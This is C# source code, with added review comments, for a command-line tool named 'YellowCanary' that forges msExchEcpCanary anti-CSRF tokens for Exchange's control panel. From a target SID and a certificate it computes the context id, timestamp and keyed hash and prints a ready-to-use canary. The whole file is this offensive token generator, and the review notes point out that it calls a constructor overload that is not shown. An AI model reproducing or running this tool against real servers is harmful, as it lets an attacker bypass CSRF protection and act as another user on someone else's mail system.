/// <summary>
/// Produces the keyed hash that forms the last segment of the canary.
/// </summary>
/// <param name="userContextIdBinary">Raw bytes of the per-token context id.</param>
/// <param name="timeStampBinary">Timestamp block; the canary kind is read back out of it.</param>
/// <param name="logonUniqueKey">Identity string bound into the hash (Main passes a SID here).</param>
/// <param name="logData">Receives the log text produced by FormatLogData for the decoded kind.</param>
/// <returns>Whatever ComputeHmac returns for the three input buffers.</returns>
private byte[] ComputeHash(byte[] userContextIdBinary, byte[] timeStampBinary, string logonUniqueKey, out string logData)
{
    Canary15.CanaryKind kindFromStamp = Canary15.GetCanaryKind(timeStampBinary);

    // A default UnicodeEncoding is little-endian UTF-16, and GetBytes emits no byte-order mark.
    byte[] keyBytes = new UnicodeEncoding().GetBytes(logonUniqueKey);

    // The buffers are handed over in this fixed order: context id, timestamp, identity.
    // NOTE(review): ComputeHmac is not shown here; presumably it is keyed from the certificate
    // referenced by certpath/certpass. If so, that private key is the only secret behind the
    // token and needs to be protected accordingly. Confirm against ComputeHmac.
    byte[][] macInput = { userContextIdBinary, timeStampBinary, keyBytes };
    byte[] mac = this.ComputeHmac(macInput);

    logData = Canary15.FormatLogData(kindFromStamp);
    return mac;
}
/// <summary>
/// Creates a fresh canary for <paramref name="logonUniqueKey"/>: a new random context id,
/// a timestamp taken from the current UTC time, and the hash over both plus the identity.
/// </summary>
/// <param name="logonUniqueKey">Identity string the canary is bound to.</param>
/// <param name="certpath">Path of the certificate file; stored on the instance.</param>
/// <param name="certpass">Password for that certificate; stored on the instance as a plain string.</param>
/// <param name="canaryKind">Kind value encoded into the timestamp block.</param>
public Canary15(string logonUniqueKey, string certpath, string certpass, Canary15.CanaryKind canaryKind)
{
    // Stored before ComputeHash runs. NOTE(review): presumably ComputeHmac reads these fields;
    // it is not visible here.
    this.certpath = certpath;
    this.certpass = certpass;

    byte[] contextId = Guid.NewGuid().ToByteArray();
    long nowTicks = DateTime.UtcNow.Ticks;
    byte[] stamp = Canary15.BinaryFromTicksKindScope(nowTicks, canaryKind);

    string hashLog;
    byte[] mac = this.ComputeHash(contextId, stamp, logonUniqueKey, out hashLog);
    this.Init(contextId, stamp, logonUniqueKey, mac, hashLog);

    // Init leaves IsRenewed false and derives IsAboutToExpire from the timestamp;
    // a newly created canary overrides both.
    this.IsRenewed = true;
    this.IsAboutToExpire = false;
}
/// <summary>
/// Fills in the instance state from the already computed parts and builds the encoded
/// canary string from context id, timestamp and hash, concatenated in that order.
/// </summary>
/// <param name="userContextIdBinary">Context id bytes; also turned into a Guid, so 16 bytes are required.</param>
/// <param name="timeStampBinary">Timestamp block holding ticks and kind.</param>
/// <param name="logonUniqueKey">Identity string, stored unchanged.</param>
/// <param name="hashBinary">Hash bytes appended after the timestamp.</param>
/// <param name="logData">Log text, stored unchanged.</param>
private void Init(byte[] userContextIdBinary, byte[] timeStampBinary, string logonUniqueKey, byte[] hashBinary, string logData)
{
    long ticks = Canary15.GetCanaryTicks(timeStampBinary);

    this.kind = Canary15.GetCanaryKind(timeStampBinary);
    this.CreationTime = new DateTime(ticks, DateTimeKind.Utc);
    this.IsRenewed = false;
    this.IsAboutToExpire = Canary15.IsNearExpiration(ticks);

    int idLength = userContextIdBinary.Length;
    int stampLength = timeStampBinary.Length;
    int hashLength = hashBinary.Length;

    // Wire layout of the token before encoding: [context id][timestamp][hash].
    byte[] packed = new byte[idLength + stampLength + hashLength];
    Buffer.BlockCopy(userContextIdBinary, 0, packed, 0, idLength);
    Buffer.BlockCopy(timeStampBinary, 0, packed, idLength, stampLength);
    Buffer.BlockCopy(hashBinary, 0, packed, idLength + stampLength, hashLength);

    // "N" formats the Guid as 32 hex digits without hyphens or braces.
    this.UserContextId = new Guid(userContextIdBinary).ToString("N");
    this.LogonUniqueKey = logonUniqueKey;
    this.canaryString = Canary15.Encode(packed);
    this.LogData = logData;
}
/// <summary>
/// Command-line entry point: prints the banner, checks that three arguments were given,
/// builds a canary for the supplied SID and prints the SID and the canary string.
/// </summary>
/// <param name="args">SID, certificate file and certificate password, in that order.</param>
static void Main(string[] args)
{
    string banner = @" #==================================================== # YellowCanary - generate msExchEcpCanary csrf tokens #==================================================== ";
    Console.WriteLine(banner);

    if (args.Length < 3)
    {
        string exeName = AppDomain.CurrentDomain.FriendlyName;
        Console.WriteLine("Usage: {0} <sid> <cert> <certpass>", exeName);
        Console.WriteLine("Eg: {0} S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax", exeName);
        return;
    }

    // The certificate password arrives as a command-line argument, so it is visible in
    // process listings and shell history on the machine where this runs.
    string sid = args[0];
    string certFile = args[1];
    string certPassword = args[2];

    // NOTE(review): the only constructor visible alongside this method takes a fourth
    // CanaryKind argument; this three-argument call relies on an overload not shown here.
    Canary15 token = new Canary15(sid, certFile, certPassword);

    Console.WriteLine("security identifier : {0}", sid);
    Console.WriteLine("msExchEcpCanary : {0}", token.canaryString);
}